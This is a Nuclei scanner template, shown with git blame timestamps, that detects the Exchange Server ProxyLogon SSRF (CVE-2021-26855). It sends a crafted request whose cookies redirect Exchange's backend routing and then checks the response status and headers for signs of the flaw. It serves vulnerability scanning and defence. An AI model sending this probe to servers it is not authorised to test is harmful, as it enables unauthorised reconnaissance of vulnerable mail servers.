nuclei-templates/cves/2021/CVE-2021-26855.yaml

36 lines
1.2 KiB
YAML
Raw Normal View History

2021-03-06 07:00:59 +00:00
id: CVE-2021-26855
info:
name: Exchange Server SSRF Vulnerability
author: madrobot
severity: critical
description: |
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
tags: cve,cve2021,ssrf,rce,exchange
2021-03-06 10:55:24 +00:00
reference: |
- https://proxylogon.com/#timeline
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
- https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
- https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
2021-03-06 07:34:26 +00:00
2021-03-06 07:00:59 +00:00
requests:
- raw:
- |
GET /owa/auth/x.js HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
2021-03-08 14:11:41 +00:00
Cookie: X-AnonResource=true; X-AnonResource-Backend=somethingnonexistent/ecp/default.flt?~3; X-BEResource=somethingnonexistent/owa/auth/logon.aspx?~3;
2021-03-06 07:00:59 +00:00
Accept-Language: en
Connection: close
matchers-condition: and
matchers:
- type: status
status:
- 500
2021-03-08 14:11:41 +00:00
- 503
2021-03-06 07:00:59 +00:00
- type: word
words:
2021-03-08 14:11:41 +00:00
- 'X-Calculatedbetarget: somethingnonexistent'
2021-03-08 08:13:06 +00:00
part: header